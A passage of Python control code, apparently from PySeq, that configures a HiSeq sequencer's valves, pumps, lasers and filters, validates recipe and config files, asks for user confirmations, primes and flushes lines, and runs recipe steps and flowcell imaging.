for fc in flowcells.values():
AorB = fc.position
hs.v24[AorB].side_ports = side_ports
hs.v24[AorB].sample_port = sample_port
hs.v24[AorB].port_dict = port_dict # Assign ports on HiSeq
if variable_ports is not None:
v_ports = variable_ports.split(',')
for v in v_ports: # Assign variable ports
hs.v24[AorB].variable_ports.append(v.strip())
hs.p[AorB].update_limits(n_barrels) # Assign barrels per lane to pump
for section in fc.sections: # Convert coordinate sections on flowcell to stage info
pos = hs.position(AorB, fc.sections[section])
fc.stage[section] = pos
fc.stage[section]['z_pos'] = [hs.z.image_step]*3
## TODO: Changing laser color unnecessary for now, revisit if upgrading HiSeq
# Configure laser color & filters
# colors = [method.get('laser color 1', fallback = 'green'),
# method.get('laser color 2', fallback = 'red')]
# for i, color in enumerate(default_colors):
# if color is not colors[i]:
# laser = hs.lasers.pop(color) # Remove default laser color
# hs.lasers[colors[i]] = laser # Add new laser
# hs.lasers[colors[i]].color = colors[i] # Update laser color
# hs.optics.colors[i] = colors[i] # Update laser line color
# Check laser power
for color in hs.lasers.keys():
lp = int(method.get(color+' laser power', fallback = 10))
if hs.lasers[color].min_power <= lp <= hs.lasers[color].max_power:
hs.lasers[color].set_point = lp
else:
error('MethodFile:: Invalid '+color+' laser power')
#Check filters for laser at each cycle are valid
hs.optics.cycle_dict = check_filters(hs.optics.cycle_dict, hs.optics.ex_dict)
focus_filters = [method.get('green focus filter', fallback = 2.0),
method.get('red focus filter', fallback = 2.4)]
for i, f in enumerate(focus_filters):
try:
f = float(f)
except:
pass
if f not in hs.optics.ex_dict[hs.optics.colors[i]]:
error('ConfigFile:: Focus filter not valid.')
else:
hs.optics.focus_filters[i] = f
# Check Autofocus Settings
hs.AF = method.get('autofocus', fallback = 'partial once')
if hs.AF.lower() in ['','none']: hs.AF = None
if hs.AF not in ['partial', 'partial once', 'full', 'full once', 'manual', None]:
# Skip autofocus and set objective position in config file
try:
if hs.obj.min_z <= int(hs.AF) <= hs.obj.max_z:
hs.AF = int(hs.AF)
except:
error('ConfigFile:: Auto focus method not valid.')
#Enable/Disable z stage
hs.z.active = method.getboolean('enable z stage', fallback = True)
# Get focus Tolerance
hs.focus_tol = float(method.get('focus tolerance', fallback = 0))
# Get focus range
range = float(method.get('focus range', fallback = 90))
spacing = float(method.get('focus spacing', fallback = 4.1))
hs.obj.update_focus_limits(range=range, spacing=spacing) # estimate, get actual value in hs.obj_stack()
hs.stack_split = float(method.get('stack split', fallback = 2/3))
hs.bundle_height = int(method.get('bundle height', fallback = 128))
# Assign output directory
save_path = experiment['save path']
experiment_name = experiment['experiment name']
save_path = join(experiment['save path'], experiment['experiment name'])
if not os.path.exists(save_path):
try:
os.mkdir(save_path)
except:
error('ConfigFile:: Save path not valid.')
# Assign image directory
image_path = join(save_path, experiment['image path'])
if not os.path.exists(image_path):
os.mkdir(image_path)
with open(join(image_path,'machine_name.txt'),'w') as file:
file.write(hs.name)
hs.image_path = image_path
# Assign log directory
log_path = join(save_path, experiment['log path'])
if not os.path.exists(log_path):
os.mkdir(log_path)
hs.log_path = log_path
return hs
def confirm_settings(recipe_z_planes = []):
"""Have user confirm the HiSeq settings before experiment."""
experiment = config['experiment']
method = experiment['method']
method = config[method]
total_cycles = int(experiment['cycles'])
# Print settings to screen
try:
import tabulate
print_table = True
except:
print_table = False
if n_errors > 0:
print()
if not userYN('Continue checking experiment before exiting'):
sys.exit()
# Experiment summary
print()
print('-'*80)
print()
print(experiment['experiment name'], 'summary')
print()
print('method:', experiment['method'])
print('recipe:', method['recipe'])
print('cycles:', experiment['cycles'])
pre_recipe = method.get('pre recipe', fallback = None)
if pre_recipe is not None:
print('pre recipe:', pre_recipe)
first_port = method.get('first port', fallback = None)
if first_port is not None:
print('first_port:', first_port)
print('save path:', experiment['save path'])
print('enable z stage:', hs.z.active)
print('machine:', experiment['machine'])
print()
if not userYN('Confirm experiment'):
sys.exit()
print()
# Flowcell summary
table = {}
for fc in flowcells:
table[fc] = flowcells[fc].sections.keys()
print('-'*80)
print()
print('Flowcells:')
print()
if print_table:
print(tabulate.tabulate(table, headers = 'keys', tablefmt = 'presto'))
else:
print(table)
print()
if not userYN('Confirm flowcells'):
sys.exit()
print()
# Valve summary:
table = []
ports = []
for port in port_dict:
if not isinstance(port_dict[port], dict):
ports.append(int(port_dict[port]))
table.append([port_dict[port], port])
print('-'*80)
print()
print('Valve:')
print()
if print_table:
print(tabulate.tabulate(table, headers=['port', 'reagent'], tablefmt = 'presto'))
else:
print(table)
print()
if not userYN('Confirm valve assignment'):
sys.exit()
print()
# Pump summary:
AorB = [*flowcells.keys()][0]
fc = flowcells[AorB]
print('-'*80)
print()
print('Pump Settings:')
print()
inlet_ports = int(method.get('inlet ports', fallback = 2))
print('Reagents pumped through row with ', inlet_ports, 'inlet ports')
print(hs.p[AorB].n_barrels, 'syringe pump barrels per lane')
print('Flush volume:',fc.volume['flush'], 'μL')
if any([True for port in ports if port in [*range(1,9),*range(10,20)]]):
print('Main prime volume:', fc.volume['main'], 'μL')
if any([True for port in ports if port in [9,21,22,23,24]]):
print('Side prime volume:', fc.volume['side'], 'μL')
if 20 in ports:
print('Sample prime volume:', fc.volume['sample'], 'μL')
print('Flush flowrate:',fc.pump_speed['flush'], 'μL/min')
print('Prime flowrate:',fc.pump_speed['prime'], 'μL/min')
print('Reagent flowrate:',fc.pump_speed['reagent'], 'μL/min')
print('Max volume:', hs.p[AorB].max_volume, 'μL')
print('Min flow:', hs.p[AorB].min_flow, 'μL/min')
print()
if not userYN('Confirm pump settings'):
sys.exit()
# Cycle summary:
variable_ports = hs.v24[AorB].variable_ports
start_cycle = 1
if method.get('pre recipe', fallback = None) is not None:
start_cycle = 0
table = []
for cycle in range(start_cycle,total_cycles+1):
row = []
row.append(cycle)
if len(variable_ports) > 0:
for vp in variable_ports:
if cycle > 0:
row.append(port_dict[vp][cycle])
else:
row.append(None)
if IMAG_counter > 0:
colors = [*hs.optics.cycle_dict.keys()]
for color in colors:
row.append(hs.optics.cycle_dict[color][cycle])
else:
colors = []
table.append(row)
print('-'*80)
print()
print('Cycles:')
print()
if len(variable_ports) + len(colors) > 0:
headers = ['cycle', *variable_ports, *colors]
if print_table:
print(tabulate.tabulate(table, headers, tablefmt='presto'))
else:
print(headers)
print(table)
print()
stop_experiment = not userYN('Confirm cycles')
else:
if total_cycles == 1:
stop_experiment = not userYN('Confirm only 1 cycle')
else:
stop_experiment = not userYN('Confirm all', total_cycles, 'cycles are the same')
if stop_experiment:
sys.exit()
print()
if IMAG_counter > 0:
print('-'*80)
print()
print('Imaging settings:')
print()
laser_power = [hs.lasers['green'].set_point,
hs.lasers['red'].set_point]
print('green laser power:', laser_power[0], 'mW')
print('red laser power:',laser_power[1], 'mW')
print('autofocus:', hs.AF)
if hs.AF is not None:
print('focus spacing', hs.obj.focus_spacing,'um')
print('focus range', hs.obj.focus_range, '%')
if hs.focus_tol > 0 and hs.AF != 'manual':
print('focus tolerance:', hs.focus_tol, 'um')
elif hs.AF != 'manual':
print('focus tolerance: None')
print('WARNING::Out of focus image risk increased')
for i, filter in enumerate(hs.optics.focus_filters):
if filter == 'home':
focus_laser_power = 0
elif filter == 'open':
focus_laser_power = laser_power[i]
else:
focus_laser_power = laser_power[i]*10**(-float(filter))
print(colors[i+1], 'focus laser power ~', focus_laser_power, 'mW')
print('z position when imaging:', hs.z.image_step)
if hs.overlap > 0:
print('pixel overlap:', hs.overlap)
print('overlap direction:', hs.overlap_dir)
z_planes = int(method.get('z planes', fallback = 0))
if z_planes > 0:
print('z planes:', z_planes)
else:
print('z planes:', *recipe_z_planes)
if z_planes > 1 or any(recipe_z_planes):
print('stack split:', hs.stack_split)
if not userYN('Confirm imaging settings'):
sys.exit()
# Check if previous focus positions have been found, and confirm to use
if os.path.exists(join(hs.log_path, 'focus_config.cfg')):
focus_config = configparser.ConfigParser()
focus_config.read(join(hs.log_path, 'focus_config.cfg'))
cycles = 0
sections = []
for section in config.options('sections'):
if focus_config.has_section(section):
sections.append(section)
n_focus_cycles = len(focus_config.options(section))
if n_focus_cycles > cycles:
cycles = n_focus_cycles
table = []
for section in sections:
row = []
row.append(section)
for c in range(1,cycles+1):
if focus_config.has_option(section, str(c)):
row.append(focus_config[section][str(c)])
else:
row.append(None)
table.append(row)
if len(sections) > 0 and cycles > 0:
print('-'*80)
print()
print('Previous Autofocus Objective Positions:')
print()
headers = ['section', *['cycle'+str(c) for c in range(1,cycles+1)]]
if print_table:
print(tabulate.tabulate(table, headers, tablefmt='presto'))
else:
print(headers)
print(table)
print()
if not userYN('Confirm using previous autofocus positions'):
sys.exit()
print()
##########################################################
## Setup HiSeq ###########################################
##########################################################
def initialize_hs(IMAG_counter):
"""Initialize the HiSeq and return the handle."""
global n_errors
experiment = config['experiment']
method = experiment['method']
method = config[method]
if n_errors == 0:
if not userYN('Initialize HiSeq'):
sys.exit()
hs.initializeCams(logger)
x_homed = hs.initializeInstruments()
if not x_homed:
error('HiSeq:: X-Stage did not home correctly')
# HiSeq Settings
inlet_ports = int(method.get('inlet ports', fallback = 2))
hs.move_inlet(inlet_ports) # Move to 2 or 8 port inlet
# Set laser power
for color in hs.lasers.keys():
laser_power = int(method.get(color+' laser power', fallback = 10))
hs.lasers[color].set_power(laser_power)
if IMAG_counter > 0:
if not hs.lasers[color].on:
error('HiSeq:: Lasers did not turn on.')
hs.f.LED('A', 'off')
hs.f.LED('B', 'off')
LED('all', 'startup')
hs.move_stage_out()
return hs
##########################################################
## Check Instructions ####################################
##########################################################
def check_instructions():
"""Check the instructions for errors.
**Returns:**
- first_line (int): Line number for the recipe to start from on the
initial cycle.
- IMAG_counter (int): The number of imaging steps.
"""
method = config.get('experiment', 'method')
method = config[method]
first_port = method.get('first port', fallback = None) # Get first reagent to use in recipe
# Backdoor to input line number for first step in recipe
try:
first_port = int(first_port)
first_line = first_port
first_port = None
except:
first_line = 0
variable_ports = method.get('variable reagents', fallback = None)
valid_wait = []
ports = []
for port in config['reagents'].items():
ports.append(port[1])
if variable_ports is not None:
variable_ports = variable_ports.split(',')
for port in variable_ports:
ports.append(port.strip())
valid_wait = ports
valid_wait.append('IMAG')
valid_wait.append('STOP')
valid_wait.append('TEMP')
recipes = {}
recipes['Recipe'] = config['experiment']['recipe path']
pre_recipe = method.get('pre recipe',fallback= None)
if pre_recipe is not None:
recipes['Pre Recipe'] = pre_recipe
for recipe in sorted([*recipes.keys()]):
f = recipes[recipe]
try:
f = open(recipes[recipe])
except:
error(recipe,'::Unable to open', recipes[recipe])
#Remove blank lines
f_ = [line for line in f if line.strip()]
f.close()
IMAG_counter = 0.0
wait_counter = 0
z_planes = []
for line_num, line in enumerate(f_):
instrument, command = parse_line(line)
if instrument == 'PORT':
# Make sure ports in instruction files exist in port dictionary in config file
if command not in ports:
error(recipe,'::', command, 'on line', line_num,
'is not listed as a reagent')
#Find line to start at for first cycle
if first_line == 0 and first_port is not None and recipe == 'Recipe':
if command.find(first_port) != -1:
first_line = line_num
# Make sure pump volume is a number
elif instrument == 'PUMP':
if command.isdigit() == False:
error(recipe,'::Invalid volume on line', line_num)
# Make sure wait command is valid
elif instrument == 'WAIT':
wait_counter += 1
if command not in valid_wait:
error(recipe,'::Invalid wait command on line', line_num)
# Make sure z planes is a number
elif instrument == 'IMAG':
IMAG_counter = int(IMAG_counter + 1)
# Flag to check that WAIT is used before IMAG when running 2 flowcells
if wait_counter >= IMAG_counter:
IMAG_counter = float(IMAG_counter)
if command.isdigit() == False:
error(recipe,'::Invalid number of z planes on line', line_num)
else:
z_planes.append(command)
# Make sure hold time (minutes) is a number
elif instrument == 'HOLD':
if command.isdigit() == False:
if command != 'STOP':
error(recipe,'::Invalid time on line', line_num)
else:
print(recipe,'::WARNING::HiSeq will stop until user input at line',
line_num)
elif instrument == 'TEMP':
if not command.isdigit():
error(recipe,'::Invalid temperature on line', line_num)
# # Warn user that HiSeq will completely stop with this command
# elif instrument == 'STOP':
# print('WARNING::HiSeq will stop until user input at line',
# line_num)
# Make sure the instrument name is valid
else:
error(recipe,'::Bad instrument name on line',line_num)
print(line)
return first_line, IMAG_counter, z_planes
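# Illustrative recipe snippet (added; the reagent name 'water' is hypothetical and must
# appear in the config [reagents] section or as a variable reagent):
#   PORT: water     # select a reagent port
#   PUMP: 500       # pump volume (integer)
#   HOLD: 10        # hold time in minutes (integer), or STOP to pause for user input
#   WAIT: IMAG      # wait for a reagent, IMAG, STOP, or TEMP event
#   TEMP: 55        # set flowcell temperature (integer)
#   IMAG: 15        # image with 15 z planes (integer)
# Any other instrument name is reported as an error by check_instructions().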
##########################################################
## Check Ports ###########################################
##########################################################
def check_ports():
"""Check for port errors and return a port dictionary.
"""
method = config.get('experiment', 'method')
method = config[method]
total_cycles = int(config.get('experiment', 'cycles'))
# Get cycle and port information from configuration file
valve = config['reagents'] # Get dictionary of port number of valve : name of reagent
cycle_variables = method.get('variable reagents', fallback = None ) # Get list of port names in recipe that change every cycle
cycle_reagents = config['cycles'].items() # Get variable reagents that change with each cycle
port_dict = {}
# Make sure there are no duplicated names in the valve
if len(valve.values()) != len(set(valve.values())):
error('ConfigFile: Reagent names are not unique')
#TODO: PRINT DUPLICATES
if len(valve) > 0:
# Create port dictionary
for port in valve.keys():
try:
port_dict[valve[port]] = int(port)
except:
error('ConfigFile:List reagents as n (int) = name (str) ')
# Add cycle variable port dictionary
if cycle_variables is not None:
cycle_variables = cycle_variables.split(',')
for variable in cycle_variables:
variable = variable.replace(' ','')
if variable in port_dict:
error('ConfigFile::Variable', variable, 'can not be a reagent')
else:
port_dict[variable] = {}
# Fill cycle variable port dictionary with cycle: reagent name
for cycle in cycle_reagents:
reagent = cycle[1]
variable, cyc_number = cycle[0].split(' ')
if reagent in valve.values():
if variable in port_dict:
port_dict[variable][int(cyc_number)] = reagent
else:
error('ConfigFile::', variable, 'not listed as variable reagent')
else:
error('ConfigFiles::Cycle reagent:', reagent, 'does not exist on valve')
# Check number of reagents in variable reagents matches number of total cycles
for variable in cycle_variables:
variable = variable.replace(' ','')
if len(port_dict[variable]) != total_cycles:
error('ConfigFile::Number of', variable, 'reagents does not match experiment cycles')
else:
print('WARNING::No ports are specified')
# table = []
# for port in port_dict:
# if not isinstance(port_dict[port], dict):
# table.append([port_dict[port], port])
# print('Valve summary')
# print(tabulate.tabulate(table, headers=['port', 'reagent'], tablefmt = 'presto'))
return port_dict
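# Illustrative config snippet (added; port numbers, reagent and variable names are hypothetical):
#   [reagents]
#   1 = water
#   3 = nuc A
#   4 = nuc B
#   [cycles]
#   nuc 1 = nuc A
#   nuc 2 = nuc B
# 'nuc' must be listed under 'variable reagents' in the method section, each cycle reagent
# must also exist in [reagents], and the number of 'nuc' entries must equal the cycle count.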
def check_filters(cycle_dict, ex_dict):
"""Check filter section of config file.
**Errors:**
- Invalid Filter: System exits when a listed filter does not match
configured filters on the HiSeq.
- Duplicate Cycle: System exits when a filter for a laser is listed for
the same cycle more than once.
- Invalid laser: System exits when a listed laser color does not match
configured laser colors on the HiSeq.
"""
colors = [*cycle_dict.keys()]
# Check laser, cycle, and filter are valid
cycle_filters = config['filters'].items()
for item in cycle_filters:
# Get laser cycle = filter
filter = item[1]
# filters are floats, except for home and open,
# and emission (True/False)
if filter.lower() in ['true', 'yes', '1', 't', 'y']:
filter = True
elif filter.lower() in ['false', 'no', '0', 'f', 'n']:
filter = False
elif filter not in ['home','open']:
filter = float(filter)
laser, cycle = item[0].split()
cycle = int(cycle)
# Check if laser is valid, can use partial match ie, g or G for green
if laser in colors:
laser = [laser]
else:
laser = [colors[i] for i, c in enumerate(colors) if laser.lower() in c[0]]
if len(laser) > 0:
laser = laser[0]
if laser in ex_dict.keys():
if filter in ex_dict[laser]:
if cycle not in cycle_dict[laser]:
cycle_dict[laser][cycle] = filter
else:
error('ConfigFile::Duplicated cycle for', laser, 'laser')
elif laser == 'em':
if isinstance(filter, bool):
if cycle not in cycle_dict[laser]:
cycle_dict[laser][cycle] = filter
else:
error('ConfigFile::Duplicated emission filter cycle')
else:
error('ConfigFile::Invalid filter for', laser, 'laser')
else:
error('ConfigFile:Invalid laser')
# Add default/home to cycles with out filters specified
method = config.get('experiment', 'method')
method = config[method]
start_cycle = 1
if method.get('pre recipe', fallback = None):
start_cycle = 0
last_cycle = int(config.get('experiment','cycles'))+1
# Get/check default filters
default_filters = {}
fallbacks = {'red':'home', 'green':'home', 'em':'True'}
for laser in colors:
filter = method.get('default '+laser+' filter', fallback = fallbacks[laser])
try:
filter = float(filter)
except:
pass
if laser in ex_dict.keys():
if filter in ex_dict[laser].keys():
default_filters[laser] = filter
elif laser == 'em':
if filter in ['True', 'False']:
default_filters[laser] = filter
# Assign default filters to missing cycles
for cycle in range(start_cycle,last_cycle):
for laser in colors:
if cycle not in cycle_dict[laser]:
cycle_dict[laser][cycle] = default_filters[laser]
return cycle_dict
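# Illustrative config snippet (added; whether a numeric filter value is valid depends on
# the excitation filters configured on the HiSeq):
#   [filters]
#   green 1 = open
#   red 1 = 1.4
#   em 1 = True
# Entries are "<laser> <cycle> = <filter>" where filters are floats, 'home', or 'open',
# and 'em' takes True/False; cycles without an entry fall back to the method defaults.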
def LED(AorB, indicate):
"""Control front LEDs to communicate what the HiSeq is doing.
**Parameters:**
- AorB (str): Flowcell position (A or B), or all.
- indicate (str): Current action of the HiSeq or state of the flowcell.
=========== =========== ==========================================================
LED MODE    indicator   HiSeq Action / Flowcell State
=========== =========== ==========================================================
off         off         The flowcell is not in use.
yellow      error       There is an error with the flowcell.
green       startup     The HiSeq is starting up or shutting down.
pulse green user        The HiSeq requires user input.
blue        sleep       The flowcell is holding or waiting.
pulse blue  awake       HiSeq valve, pump, or temperature action on the flowcell.
sweep blue  imaging     HiSeq is imaging the flowcell.
=========== =========== ==========================================================
"""
fc = []
if AorB in flowcells.keys():
fc = [AorB]
elif AorB == 'all':
fc = [*flowcells.keys()]
for AorB in fc:
if indicate == 'startup':
hs.f.LED(AorB, 'green')
elif indicate == 'user':
hs.f.LED(AorB, 'pulse green')
elif indicate == 'error':
hs.f.LED(AorB, 'yellow')
elif indicate == 'sleep':
hs.f.LED(AorB, 'blue')
elif indicate == 'awake':
hs.f.LED(AorB, 'pulse blue')
elif indicate == 'imaging':
hs.f.LED(AorB, 'sweep blue')
elif indicate == 'off':
hs.f.LED(AorB, 'off')
return True
def userYN(*args):
"""Ask a user a Yes/No question and return True if Yes, False if No."""
question = ''
for a in args:
question += str(a) + ' '
response = True
while response:
answer = input(question + '? Y/N = ')
answer = answer.upper().strip()
if answer == 'Y':
response = False
answer = True
elif answer == 'N':
response = False
answer = False
return answer
def do_flush():
"""Flush all, some, or none of lines."""
AorB_ = [*flowcells.keys()][0]
port_dict = hs.v24[AorB_].port_dict
# Select lines to flush
LED('all', 'user')
confirm = False
while not confirm:
flush_ports = input("Flush all, some, or none of the lines? ")
if flush_ports.strip().lower() == 'all':
flush_all = True
flush_ports = [*port_dict.keys()]
for vp in hs.v24[AorB_].variable_ports:
if vp in flush_ports:
flush_ports.remove(vp)
confirm = userYN('Confirm flush all lines')
elif flush_ports.strip().lower() in ['none', 'N', 'n', '']:
flush_ports = []
confirm = userYN('Confirm skip flushing lines')
else:
good =[]
bad = []
for fp in flush_ports.split(','):
fp = fp.strip()
if fp in port_dict.keys():
good.append(fp)
else:
try:
fp = int(fp)
if fp in range(1,hs.v24[AorB_].n_ports+1):
good.append(fp)
else:
bad.append(fp)
except:
bad.append(fp)
if len(bad) > 0:
print('Valid ports:', *good)
print('Invalid ports:', *bad)
confirm = not userYN('Re-enter lines to flush')
else:
confirm = userYN('Confirm only flushing',*good)
if confirm:
flush_ports = good
if len(flush_ports) > 0:
while not userYN('Temporary flowcell(s) locked on to stage'): pass
while not userYN('All valve input lines in water'): pass
while not userYN('Ready to flush'): pass
LED('all', 'startup')
# Flush ports
speed = flowcells[AorB_].pump_speed['flush']
volume = flowcells[AorB_].volume['flush']
for port in flush_ports:
if port in hs.v24[AorB_].variable_ports:
                # A variable port maps to several cycle-specific ports; queue all of them
                flush_ports.extend(hs.v24[AorB_].port_dict[port].values())
else:
hs.message('Flushing ' + str(port))
for fc in flowcells.values():
AorB = fc.position
fc.thread = threading.Thread(target=hs.v24[AorB].move,
args=(port,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
for fc in flowcells.values():
AorB = fc.position
fc.thread = threading.Thread(target=hs.p[AorB].pump,
args=(volume, speed,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
##########################################################
## Flush Lines ###########################################
##########################################################
def do_prime(flush_YorN):
"""Prime lines with all reagents in config if prompted."""
LED('all', 'user')
## Prime lines
confirm = False
while not confirm:
prime_YorN = userYN("Prime lines")
if prime_YorN:
confirm = userYN("Confirm prime lines")
else:
confirm = userYN("Confirm skip priming lines")
# LED('all', 'startup')
# hs.z.move([0,0,0])
# hs.move_stage_out()
#LED('all', 'user')
if prime_YorN:
if flush_YorN:
while not userYN('Temporary flowcell(s) locked on to stage'): pass
while not userYN('Valve input lines in reagents'): pass
while not userYN('Ready to prime lines'): pass
#Flush all lines
LED('all', 'startup')
while True:
AorB_ = [*flowcells.keys()][0]
port_dict = hs.v24[AorB_].port_dict
speed = flowcells[AorB_].pump_speed['prime']
for port in port_dict.keys():
if isinstance(port_dict[port], int):
hs.message('Priming ' + str(port))
for fc in flowcells.values():
port_num = port_dict[port]
AorB = fc.position
fc.thread = threading.Thread(target=hs.v24[AorB].move,
args=(port,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
for fc in flowcells.values():
if port_num in hs.v24[AorB].side_ports:
volume = fc.volume['side']
elif port_num == hs.v24[AorB].sample_port:
volume = fc.volume['sample']
else:
volume = fc.volume['main']
AorB = fc.position
fc.thread = threading.Thread(target=hs.p[AorB].pump,
args=(volume, speed,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
break
# Rinse flowcells
method = config.get('experiment', 'method') # Read method specific info
method = config[method]
rinse_port = method.get('rinse', fallback = None)
rinse = rinse_port in hs.v24[AorB].port_dict
if rinse_port == port: # Option to skip rinse if last reagent pump was rinse reagent
rinse = False
# Get rinse reagents
if not rinse:
LED('all', 'user')
print('Last reagent pumped was', port)
if userYN('Rinse flowcell'):
while not rinse:
if rinse_port not in hs.v24[AorB].port_dict:
rinse_port = input('Specify rinse reagent: ')
rinse = rinse_port in hs.v24[AorB].port_dict
if not rinse:
print('ERROR::Invalid rinse reagent')
print('Choose from:', *list(hs.v24[AorB].port_dict.keys()))
if rinse:
# Simultaneously Rinse Flowcells
for fc in flowcells.values():
fc.thread = threading.Thread(target=do_rinse,
args=(fc,rinse_port,))
fc.thread.start()
alive = True
# Wait for rinsing to complete
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
LED('all', 'user')
while not userYN('Temporary flowcell(s) removed'): pass
while not userYN('Experiment flowcell(s) locked on to stage'): pass
if not prime_YorN:
while not userYN('Valve input lines in reagents'): pass
while not userYN('Door closed'): pass
##########################################################
def do_nothing():
"""Do nothing."""
pass
##########################################################
## iterate over lines, send to pump, and print response ##
##########################################################
def do_recipe(fc):
"""Do the next event in the recipe.
**Parameters:**
- fc (flowcell): The current flowcell.
"""
AorB = fc.position
fc.thread = None
# Skip to first line of recipe on initial cycle
if fc.cycle == 1 and fc.first_line is not None:
for i in range(fc.first_line):
line = fc.recipe.readline()
fc.first_line = None
#get instrument and command
instrument = None
while instrument is None:
line = fc.recipe.readline()
if line:
instrument, command = parse_line(line)
else:
break
if line:
# Move reagent valve
if instrument == 'PORT':
            # Move to cycle-specific reagent if it is a variable reagent
if fc.cycle <= fc.total_cycles:
if command in hs.v24[AorB].variable_ports:
command = hs.v24[AorB].port_dict[command][fc.cycle]
log_message = 'Move to ' + command
fc.thread = threading.Thread(target = hs.v24[AorB].move,
args = (command,))
if fc.cycle <= fc.total_cycles:
LED(AorB, 'awake')
# Pump reagent into flowcell
elif instrument == 'PUMP':
volume = int(command)
speed = fc.pump_speed['reagent']
log_message = 'Pumping ' + str(volume) + ' uL'
fc.thread = threading.Thread(target = hs.p[AorB].pump,
args = (volume, speed,))
if fc.cycle <= fc.total_cycles:
LED(AorB, 'awake')
# Incubate flowcell in reagent for set time
elif instrument == 'HOLD':
if command.isdigit():
holdTime = float(command)*60
log_message = 'Flowcell holding for ' + str(command) + ' min.'
if hs.virtual:
fc.thread = threading.Timer(holdTime/hs.speed_up, fc.endHOLD)
#fc.thread = threading.Timer(holdTime, fc.endHOLD)
else:
fc.thread = threading.Timer(holdTime, fc.endHOLD)
elif command == 'STOP':
hs.message('PySeq::Paused')
LED(AorB, 'user')
input("Press enter to continue...")
log_message = ('Continuing...')
fc.thread = threading.Thread(target = do_nothing)
if fc.cycle <= fc.total_cycles:
LED(AorB, 'sleep')
# Wait for other flowcell to finish event before continuing with current flowcell
elif instrument == 'WAIT':
if command == 'TEMP':
fc.thread = threading.Thread(target = hs.T.wait_fc_T,
args=(AorB, fc.temperature,))
log_message = ('Waiting to reach '+str(fc.temperature)+'°C')
elif fc.waits_for is not None:
if command in flowcells[fc.waits_for].events_since_IMAG:
log_message = command + ' has occurred, skipping WAIT'
fc.thread = threading.Thread(target = do_nothing)
else:
log_message = 'Waiting for ' + command
fc.thread = threading.Thread(target = WAIT,
args = (AorB, command,))
else:
log_message = 'Skip waiting for ' + command
fc.thread = threading.Thread(target = do_nothing)
if fc.cycle <= fc.total_cycles:
LED(AorB, 'sleep')
# Image the flowcell
elif instrument == 'IMAG':
if hs.scan_flag and fc.cycle <= fc.total_cycles:
hs.message('PySeq::'+AorB+'::Waiting for camera')
while hs.scan_flag:
pass
#hs.scan_flag = True
fc.events_since_IMAG = []
log_message = 'Imaging flowcell'
fc.thread = threading.Thread(target = IMAG,
args = (fc,int(command),))
if fc.cycle <= fc.total_cycles:
LED(AorB, 'imaging')
elif instrument == 'TEMP':
log_message = 'Setting temperature to ' + command + ' °C'
command = float(command)
fc.thread = threading.Thread(target = hs.T.set_fc_T,
args = (AorB,command,))
fc.temperature = command
# Block all further processes until user input
# elif instrument == 'STOP':
# hs.message('PySeq::Paused')
# LED(AorB, 'user')
# input("Press enter to continue...")
# hs.message('PySeq::Continuing...')
#Signal to other flowcell that current flowcell reached signal event
if fc.signal_event == instrument or fc.signal_event == command:
fc.wait_thread.set()
fc.signal_event = None
# Start new action on current flowcell
if fc.thread is not None and fc.cycle <= fc.total_cycles:
fc.addEvent(instrument, command)
hs.message('PySeq::'+AorB+'::cycle'+str(fc.cycle)+'::'+log_message)
        fc.thread.start()
elif fc.thread is not None and fc.cycle > fc.total_cycles:
fc.thread = threading.Thread(target = time.sleep, args = (10,))
else:
# End of recipe
fc.restart_recipe()
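# Hedged example (not original code) of a recipe that do_recipe() can drive,
# using the instruments handled above (PORT, PUMP, HOLD, WAIT, IMAG, TEMP).
# The exact line syntax is an assumption here, since it is determined by
# parse_line(), which is defined elsewhere in this script:
#
#     PORT: antibody_mix        # move the 24-port valve to a reagent
#     PUMP: 500                 # pump 500 uL into the flowcell
#     TEMP: 37                  # set the flowcell temperature in degrees C
#     HOLD: 60                  # incubate for 60 min
#     WAIT: IMAG                # hold until the other flowcell starts imaging
#     IMAG: 15                  # image 15 z planes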
##########################################################
## Image flowcell ########################################
##########################################################
def IMAG(fc, n_Zplanes):
"""Image the flowcell at a number of z planes.
For each section on the flowcell, the stage is first positioned
to the center of the section to find the optimal focus. Then if no
optical settings are listed, the optimal filter sets are found.
Next, the stage is repositioned to scan the entire section and
image the specified number of z planes.
**Parameters:**
fc: The flowcell to image.
n_Zplanes: The number of z planes to image.
**Returns:**
int: Time in seconds to scan the entire section.
"""
hs.scan_flag = True
AorB = fc.position
cycle = str(fc.cycle)
start = time.time()
# Manual focus ALL sections across flowcells
if hs.AF == 'manual':
focus.manual_focus(hs, flowcells)
hs.AF = 'partial once'
#Image sections on flowcell
for section in fc.sections:
pos = fc.stage[section]
hs.y.move(pos['y_initial'])
hs.x.move(pos['x_initial'])
hs.z.move(pos['z_pos'])
hs.obj.move(hs.obj.focus_rough)
# Autofocus
msg = 'PySeq::' + AorB + '::cycle' + cycle+ '::' + str(section) + '::'
if hs.AF and not isinstance(hs.AF, int):
obj_pos = focus.get_obj_pos(hs, section, cycle)
if obj_pos is None:
# Move to focus filters
for i, color in enumerate(hs.optics.colors):
hs.optics.move_ex(color,hs.optics.focus_filters[i])
hs.message(msg + 'Start Autofocus')
try:
if hs.autofocus(pos): # Moves to optimal objective position
hs.message(msg + 'Autofocus complete')
pos['obj_pos'] = hs.obj.position
else: # Moves to rough focus objective position
hs.message(msg + 'Autofocus failed')
pos['obj_pos'] = None
except:
hs.message(msg + 'Autofocus failed')
print(sys.exc_info()[0])
pos['obj_pos'] = None
else:
hs.obj.move(obj_pos)
pos['obj_pos'] = hs.obj.position
focus.write_obj_pos(hs, section, cycle)
#Override recipe number of z planes
if fc.z_planes is not None: n_Zplanes = fc.z_planes
# Calculate objective positions to image
if n_Zplanes > 1 and not isinstance(hs.AF, int):
obj_start = int(hs.obj.position - hs.nyquist_obj*n_Zplanes*hs.stack_split) # (Default) 2/3 of planes below opt_ob_pos and 1/3 of planes above
elif isinstance(hs.AF, int):
obj_start = hs.AF
else:
obj_start = hs.obj.position
image_name = AorB
image_name += '_s' + str(section)
image_name += '_r' + cycle
if fc.IMAG_counter is not None:
image_name += '_' + str(fc.IMAG_counter)
# Scan section on flowcell
